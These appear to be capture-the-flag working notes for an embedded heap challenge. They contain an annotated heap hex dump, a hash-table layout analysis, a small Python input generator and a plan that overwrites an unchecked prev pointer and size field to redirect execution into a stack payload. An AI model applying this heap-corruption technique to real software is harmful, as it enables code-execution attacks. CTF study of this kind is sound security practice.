Hash Table, plus one full box:
      0  1 2  3 4  5 6  7 8  9 a  b c  d e  f
5000:[0050 1050 1500]0b00 0300 0500 1650 2c50   .P.P.........P,P
5010:[0050 2650 2100]4250 a250 0251 6251 c251   .P&P!.BP.P.QbQ.Q
5020: 2252 8252 e252[1050 3c50 2100]0b00 0000   "R.R.R.P<P!.....
5030: 0000 0000 0000 0000 0000 0000[2650 9c50   ............&P.P
5040: b500]4141 4141 4141 4141 4141 4141 4141   ..AAAAAAAAAAAAAA
5050: 4100 e004 4141 4141 4141 4141 4141 4141   A...AAAAAAAAAAAA
5060: 4141 4100 e004 4141 4141 4141 4141 4141   AAA...AAAAAAAAAA
5070: 4141 4141 4100 e004 4141 4141 4141 4141   AAAAA...AAAAAAAA
5080: 4141 4141 4141 4100 e004 4141 4141 4141   AAAAAAA...AAAAAA
5090: 4141 4141 4141 4141 4100 e004[4141 4141   AAAAAAAAA...AAAA ; wait a second
50a0: 4141]4141 4141 4141 4141 4100 e004 4141   AAAAAAAAAAA...AA
50b0: 4141 4141 4141 4141 4141 4141 4100 e004   AAAAAAAAAAAAA...
50c0: 4141 4141 4141 4141 4141 4141 4141 4100   AAAAAAAAAAAAAAA.
50d0: e004 4141 4141 4141 4141 4141 4141 4141   ..AAAAAAAAAAAAAA
50e0: 4100 e004 4141 4141 4141 4141 4141 4141   A...AAAAAAAAAAAA
50f0: 4141 4100 e004 4141 4141 4800[9c50 5c51   AAA...AAAAH..P\Q
5100: b500]0000 0000 e004 0000 0000 0000 0000   ................

Heap metadata @ 2400: 0050 0080 0000
Heap start: 0x5000
Heap  size: 0x8000 (0x5000-0xD000)

Hash Table Header:
Hash table header metadata @ 5000: 0050 1050 1500
   [ Prev: 0x5000, Next: 0x5010, Size: 0x000a ] ; malloc block-header ({size:15,status:1})
Data: 0b00 0300 0500 1650 2c50
   00: 000b: Number of registered users(?)
   02: 0003: Parameter 1 (Box bitmask = 2^(<3>+1) - 1)
   04: 0005: Parameter 2 (Rightshift?)
   06: 5016: & Box Pointer List
   08: 502c: & Per-box User Count List

Box Pointer List:
Box list header metadata @ 5010: 0050 2650 2100
   [ Prev: 5000, Next: 5026, Size: 0010 ]
Data: 4250 a250 0251 6251 c251 2252 8252 e252
   00: 5042 & Box 0
   02: 50a2 & Box 1
   04: 5102 & Box 2
   06: 5162 & Box 3
   08: 51c2 & Box 4
   0a: 52c2 & Box 5
   0c: 5282 & Box 6
   0e: 52e2 & Box 7

Other Data Section (?)
Section header metadata @ 5026: 1050 3c50 2100
   [ Prev: 5010, Next: 503c, Size: 0010 ]
Data: 0a00 0000 0000 0000 0000 0000 0000 0000

for c in ['1', '9', 'A', 'I', 'Q', '0', '8', '@', 'H', 'P', 'AAAAAAAAAAAAAAAA', '']:
   print(f'new {c} ;',end="")

Malloc:
- Checks to make sure next pointer is always ASCENDING
- Does not check prev pointer!!!!

The Exploit:
- Overwrite the prev pointer of a block so that it points to ~ the return address on stack
- Overwrite the size parameter so that, when added to the return address, it places pc somewhere nice
- Place pc into a payload on the stack
- INT 0x7f